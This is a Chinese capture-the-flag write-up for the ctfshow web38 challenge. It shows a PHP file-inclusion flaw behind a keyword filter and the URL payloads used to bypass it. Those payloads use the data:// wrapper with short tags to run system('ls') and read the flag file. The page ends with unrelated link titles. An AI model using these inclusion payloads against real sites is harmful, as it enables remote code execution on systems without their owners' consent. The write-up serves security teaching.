ctfshow-命令执行-web38

ctf小菜鸡

2024-04-09 帮助1人

ctfshow-web38

题目描述：

学新通

原理：

审计：

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){ //过滤了flag php file
        include($c);                         //文件包含漏洞
        echo $flag;                          //输出变量flag
    
    }
        
}else{
    highlight_file(__FILE__);
}

方法：

思路：

绕过flag php file 的过滤，利用include函数文件包含漏洞

同web38利用data为协议

但是对比web38，多过滤了php，所以之前的payload不能用，我们尝试使用短标签 = 代替php

短标签
<?php 这是完整标签

<? 这是短标签

//php.ini中 short_open_tag = On //除<?php ?>，可使用更灵活的调用方法

<? /*程序操作*/

?> <?=/*函数*/?>

http://6ae1efb2-fde0-4a71-85ab-4f8883df5fac.challenge.ctf.show/?c=data://text/plain,<?= system("ls");?>
学新通 http://6ae1efb2-fde0-4a71-85ab-4f8883df5fac.challenge.ctf.show/?c=data://text/plain,<?= system("cat fla*.p*p");?>

Flag:

ctfshow{0ba40c96-eb3c-45a0-a94e-f7754f8fbc8a}

这篇好文章是转载于：学新通技术网

ctfshow-命令执行-web38

ctfshow-web38

题目描述：

原理：

审计：

方法：

思路：

同web38利用data为协议

Flag:

photoshop保存的图片太大微信发不了怎么办

Android 11 保存文件到外部存储，并分享文件

word里面弄一个表格后上面的标题会跑到下面怎么办

《学习通》视频自动暂停处理方法

photoshop扩展功能面板显示灰色怎么办

微信公众号没有声音提示怎么办

excel下划线不显示怎么办

excel打印预览压线压字怎么办

怎样阻止微信小程序自动打开

TikTok加速器哪个好免费的TK加速器推荐